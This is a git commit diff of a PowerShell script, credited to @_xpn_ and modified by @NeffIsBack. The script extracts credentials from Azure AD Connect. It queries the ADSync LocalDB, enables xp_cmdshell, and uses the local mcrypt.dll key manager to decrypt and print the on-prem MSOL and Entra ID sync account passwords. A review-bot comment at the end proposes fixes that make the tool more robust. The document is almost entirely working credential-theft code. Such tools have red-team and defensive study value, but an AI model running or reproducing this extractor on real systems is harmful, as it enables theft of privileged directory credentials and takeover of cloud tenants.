
Commit 665b77d

Add semi working Extractor script for entra id creds
1 parent 23bee81 commit 665b77d

1 file changed

Lines changed: 59 additions & 21 deletions


Lines changed: 59 additions & 21 deletions
@@ -1,5 +1,33 @@
11
# Original script by @_xpn_: https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
2-
# Modified by @NeffIsBack
2+
# Modified by @NeffIsBack:
3+
# - Added support for Entra ID sync credentials (original source: https://github.com/Gerenios/AADInternals-Endpoints/blob/6af2054705e900b733ba76c6e65bfa6cad2328cc/AADSyncSettings.ps1#L108-L116)
4+
5+
# Function to decrypt the encrypted configuration of the Azure AD Connect sync stuff
6+
function decrypter($crypted, $key_id, $instance_id, $entropy) {
7+
$script = "add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted"
8+
9+
$cmd = $client.CreateCommand()
10+
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
11+
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
12+
EXEC xp_cmdshell 'powershell.exe -c `"$script`"'"
13+
$reader = $cmd.ExecuteReader()
14+
15+
$decrypted = [string]::Empty
16+
17+
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
18+
$decrypted += $reader.GetString(0)
19+
}
20+
$reader.Close()
21+
22+
if ($decrypted -eq [string]::Empty) {
23+
Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
24+
return
25+
}
26+
27+
return $decrypted
28+
}
29+
30+
# Create a connection to the localdb instance of Azure AD Connect
331
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
432

533
try {
@@ -9,6 +37,7 @@ try {
937
return
1038
}
1139

40+
# Get the keyset_id, instance_id, and entropy from the mms_server_configuration table
1241
$cmd = $client.CreateCommand()
1342
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
1443
$reader = $cmd.ExecuteReader()
@@ -22,42 +51,51 @@ $instance_id = $reader.GetGuid(1)
2251
$entropy = $reader.GetGuid(2)
2352
$reader.Close()
2453

54+
# Get the encrypted data of the MSOL account for the on-prem AD
2555
$cmd = $client.CreateCommand()
2656
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
2757
$reader = $cmd.ExecuteReader()
2858
if ($reader.Read() -ne $true) {
29-
Write-Host "[!] Error querying mms_management_agent"
59+
Write-Host "[!] Error querying mms_management_agent for on-prem MSOL credentials"
3060
return
3161
}
3262

33-
$config = $reader.GetString(0)
34-
$crypted = $reader.GetString(1)
63+
$on_prem_config = $reader.GetString(0)
64+
$on_prem_crypted = $reader.GetString(1)
3565
$reader.Close()
3666

37-
$script = "add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted"
67+
# Decrypt the on-premise MSOL credentials
68+
$msol_on_prem_decrypted = decrypter $on_prem_crypted $key_id $instance_id $entropy
3869

70+
# Get the encrypted data of the Entra ID sync credentials
3971
$cmd = $client.CreateCommand()
40-
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
41-
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
42-
EXEC xp_cmdshell 'powershell.exe -c `"$script`"'"
72+
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE subtype = 'Windows Azure Active Directory (Microsoft)'"
4373
$reader = $cmd.ExecuteReader()
44-
45-
$decrypted = [string]::Empty
46-
47-
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
48-
$decrypted += $reader.GetString(0)
49-
}
50-
51-
if ($decrypted -eq [string]::Empty) {
52-
Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
74+
if ($reader.Read() -ne $true) {
75+
Write-Host "[!] Error querying mms_management_agent for Entra ID sync credentials"
5376
return
5477
}
5578

56-
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
57-
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
58-
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
79+
$entra_id_config = $reader.GetString(0)
80+
$entra_id_crypted = $reader.GetString(1)
81+
$reader.Close()
82+
83+
# Decrypt the Entra ID sync credentials
84+
$entra_id_decrypted = decrypter $entra_id_crypted $key_id $instance_id $entropy
85+
86+
# Extract the credentials from the decrypted XML configurations
87+
$domain = select-xml -Content $on_prem_config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
88+
$username = select-xml -Content $on_prem_config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
89+
$password = select-xml -Content $msol_on_prem_decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
5990

6091
Write-Host "[*] Credentials incoming..."
6192
Write-Host "On-prem Domain: $($domain.Domain)"
6293
Write-Host "On-prem Username: $($username.Username)"
63-
Write-Host "On-prem Password: $($password.Password)"
94+
Write-Host "On-prem Password: $($password.Password)"
95+
96+
# Extract the Entra ID sync credentials
97+
$entra_id_username = ([xml]$entra_id_config).MAConfig.'parameter-values'.parameter[0].'#text'
98+
$entra_id_password = select-xml -Content $entra_id_decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
99+
Write-Host "[*] Entra ID sync credentials incoming..."
100+
Write-Host "Entra ID Username: $($entra_id_username)"
101+
Write-Host "Entra ID Password: $($entra_id_password.Password)"
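Review bot: `decrypter` enables `show advanced options` and `xp_cmdshell` on the LocalDB instance on every call and nothing ever turns them back off, so with the second call added in this commit the ADSync instance is left with xp_cmdshell enabled and no trace of the original configuration; read the current `sp_configure` values before the `RECONFIGURE`, and once both decryptions are done issue `EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;` (and the `show advanced options` value) on the same connection. The failure branch in `decrypter` only `return`s after the `Write-Host`, so the caller receives `$null` and `select-xml -Content $msol_on_prem_decrypted` later fails on empty content instead of the script stopping at the message; `throw` there, or test the returned value at both call sites before parsing it. Separately, `$entra_id_username` is taken by position with `.parameter[0]` while the on-prem branch selects parameters by their `name` attribute via XPath; looking the Entra connector's username parameter up by its `name` (whatever that connector calls it — TODO confirm against a real `private_configuration_xml`) would not silently yield the wrong element if the parameter order differs, which is likely part of why the commit is labelled "semi working".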
